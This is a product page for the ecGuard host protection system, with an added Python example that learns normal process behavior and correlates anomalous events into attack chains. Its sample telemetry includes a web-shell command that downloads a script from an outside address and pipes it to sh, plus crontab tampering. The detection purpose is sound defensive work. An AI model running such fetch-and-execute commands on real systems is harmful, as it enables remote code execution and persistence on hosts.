eCloud Data Guard (ecGuard) is a host protection system that uses behavior analysis to detect advanced attacks and also supports monitoring and auditing of host behavior. It consists of a control center and a lightweight agent on each host, giving customers a comprehensive endpoint security solution.
Machine Learning Technology
ecGuard captures a large number of static and dynamic behavior feature vectors for endpoint users and software, and uses machine learning to train models on that behavior and classify it. In a given usage scenario the models are applied mainly to extract the normal and abnormal behavior of users and software, producing a knowledge base of normal and abnormal behavior for that scenario that makes endpoint anomaly detection more efficient.
Big Data Correlation Technology
ecGuard collects security operation data from every level and stage of the endpoint, and automatically correlates and analyzes this large volume of endpoint security data to reconstruct the attack process and locate the source of vulnerabilities and attacks. Where appropriate it widens the analysis time window, extracting attributes with intrinsic correlation through wide-time-domain analysis to identify the time, location, type, intensity and other characteristics of an attack.
Attack Scenario Traceability Technology
Using a formal representation of correlation rules and knowledge, ecGuard Attack Scenario Traceability converts the complex, unordered stream of security data into a structured, readable attack scenario. It presents a scenario diagram reflecting the attack process and intent, identifies the attacker's strategy and objective, infers alerts that were missed and predicts the next likely attack step, so that managers obtain more actionable security information.
Behavior Modeling and Detection Algorithm
ecGuard uses a data model of host security behavior that interprets fine-grained, standardized generic host events as understandable behavior.
Effective Intelligent Analysis
ecGuard applies behavioral analysis algorithms that continuously adapt to the customer's business activity in order to distinguish normal from malicious behavior. This approach yields higher detection rates and substantially fewer false alarms.
Scenario Forensics and Attack Backtracking Based on Efficient Data Retrieval
ecGuard stores detailed information about each host endpoint, including process execution, command-line operations, file access, network connections, configuration changes and more. This enables security responders to run complex queries over large volumes of data and presents the results in an easy-to-understand form.
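The three ideas this page describes, learning a baseline of normal host behavior, flagging departures from it, and correlating the surrounding events within a widened time window into an ordered attack chain, fit in a few dozen lines once the agent telemetry is available. The following is an added illustration written for this page, not ecGuard's code or data model; the event records, host name, process IDs, addresses and the 120-second window are constructed assumptions. The baseline here is the set of parent-to-child process pairs observed per host, a deliberately simple stand-in for the learned behavior models the Machine Learning section describes.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real ecGuard data). Each record is one
# host event of a kind the page lists: process start, network connection,
# file access or configuration change. Process events carry the parent
# image so parent->child pairs can be learned directly.
BASELINE_EVENTS = [
    {"ts": "2024-03-01T09:00:00", "host": "web01", "type": "process", "pid": 100, "ppid": 1,
     "parent": "systemd", "image": "nginx", "cmd": "nginx -g 'daemon off;'"},
    {"ts": "2024-03-01T09:00:01", "host": "web01", "type": "process", "pid": 101, "ppid": 100,
     "parent": "nginx", "image": "nginx", "cmd": "nginx: worker process"},
    {"ts": "2024-03-01T09:05:00", "host": "web01", "type": "process", "pid": 200, "ppid": 1,
     "parent": "systemd", "image": "cron", "cmd": "/usr/sbin/cron -f"},
    {"ts": "2024-03-01T09:05:01", "host": "web01", "type": "process", "pid": 201, "ppid": 200,
     "parent": "cron", "image": "sh", "cmd": "sh -c /usr/local/bin/logrotate.sh"},
    {"ts": "2024-03-01T09:05:02", "host": "web01", "type": "network", "pid": 101,
     "dst": "10.0.0.5", "dport": 5432},
]

# Later telemetry from the same host (also constructed): the usual nginx and
# cron activity plus a web-shell chain, nginx worker -> sh -> curl, which
# stages a file in /tmp and edits the crontab. The cron->sh step at 15:30 is
# legitimate and must stay quiet.
LIVE_EVENTS = [
    {"ts": "2024-03-02T14:00:00", "host": "web01", "type": "process", "pid": 300, "ppid": 1,
     "parent": "systemd", "image": "nginx", "cmd": "nginx -g 'daemon off;'"},
    {"ts": "2024-03-02T14:00:01", "host": "web01", "type": "process", "pid": 301, "ppid": 300,
     "parent": "nginx", "image": "nginx", "cmd": "nginx: worker process"},
    {"ts": "2024-03-02T14:10:00", "host": "web01", "type": "process", "pid": 302, "ppid": 301,
     "parent": "nginx", "image": "sh", "cmd": "sh -c 'curl http://203.0.113.9/x | sh'"},
    {"ts": "2024-03-02T14:10:01", "host": "web01", "type": "network", "pid": 302,
     "dst": "203.0.113.9", "dport": 80},
    {"ts": "2024-03-02T14:10:03", "host": "web01", "type": "file", "pid": 302,
     "path": "/tmp/.x", "op": "write"},
    {"ts": "2024-03-02T14:10:05", "host": "web01", "type": "process", "pid": 303, "ppid": 302,
     "parent": "sh", "image": "curl", "cmd": "curl http://203.0.113.9/x"},
    {"ts": "2024-03-02T14:10:09", "host": "web01", "type": "config", "pid": 302,
     "path": "/etc/crontab", "op": "modify"},
    {"ts": "2024-03-02T15:30:00", "host": "web01", "type": "process", "pid": 400, "ppid": 200,
     "parent": "cron", "image": "sh", "cmd": "sh -c /usr/local/bin/logrotate.sh"},
]


def learn_baseline(events):
    """Build the per-host set of (parent image, child image) pairs seen in training data."""
    baseline = defaultdict(set)
    for e in events:
        if e["type"] == "process":
            baseline[e["host"]].add((e["parent"], e["image"]))
    return baseline


def detect(events, baseline):
    """Flag process starts whose parent->child pair was never seen on that host."""
    return [e for e in events
            if e["type"] == "process"
            and (e["parent"], e["image"]) not in baseline.get(e["host"], set())]


def correlate(alert, events, window_seconds=120):
    """Collect the events around an alert that belong to its process tree.

    The window is widened around the alert time; the tree starts from the
    alerting process and its parent and grows with every child spawned
    inside the window, so file, network and config events of descendants
    are pulled into the same chain.
    """
    t0 = datetime.fromisoformat(alert["ts"])
    lo, hi = t0 - timedelta(seconds=window_seconds), t0 + timedelta(seconds=window_seconds)
    in_window = sorted(
        (e for e in events
         if e["host"] == alert["host"] and lo <= datetime.fromisoformat(e["ts"]) <= hi),
        key=lambda e: e["ts"])
    related = {alert["pid"], alert["ppid"]}
    for e in in_window:
        if e["type"] == "process" and e["ppid"] in related:
            related.add(e["pid"])
    return [e for e in in_window if e["pid"] in related]


def summarize(chain):
    """Render a correlated chain as ordered one-line steps for an analyst."""
    lines = []
    for e in chain:
        detail = e.get("cmd") or e.get("path") or "%s:%s" % (e.get("dst"), e.get("dport"))
        lines.append("%s %-7s pid=%d %s" % (e["ts"], e["type"], e["pid"], detail))
    return lines


if __name__ == "__main__":
    baseline = learn_baseline(BASELINE_EVENTS)
    for alert in detect(LIVE_EVENTS, baseline):
        print("ALERT: unseen parent->child %s -> %s on %s"
              % (alert["parent"], alert["image"], alert["host"]))
        print("\n".join("  " + s for s in summarize(correlate(alert, LIVE_EVENTS))))
```

Running the script prints two alerts, nginx -> sh and sh -> curl, each followed by the ordered chain of process, network, file and configuration events that the widened window and process-tree walk tie to it; the cron -> sh start at 15:30 matches the baseline and produces nothing. A real deployment would replace the parent-child set with the learned behavior models, store events in a queryable index rather than a list, and merge alerts whose process trees overlap into one scenario, but the detection and correlation steps keep this shape.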
Precise detection: monitoring of low-level host data provides effective countermeasures against a variety of obfuscation techniques, excludes interference from other systems and networks, and reduces false alarms
System stability: protection is anchored in a stable kernel layer, avoiding the version-compatibility issues caused by operating system patch upgrades and greatly reducing maintenance costs
Real-time protection: immediate defense and blocking protect important digital assets in real time
Fast evolution: AI-based learning of attack behavior patterns evolves quickly, supporting fast iteration across a variety of systems
Accurate traceability: large-scale data collection and efficient analysis provide rich information for tracing the origin of security events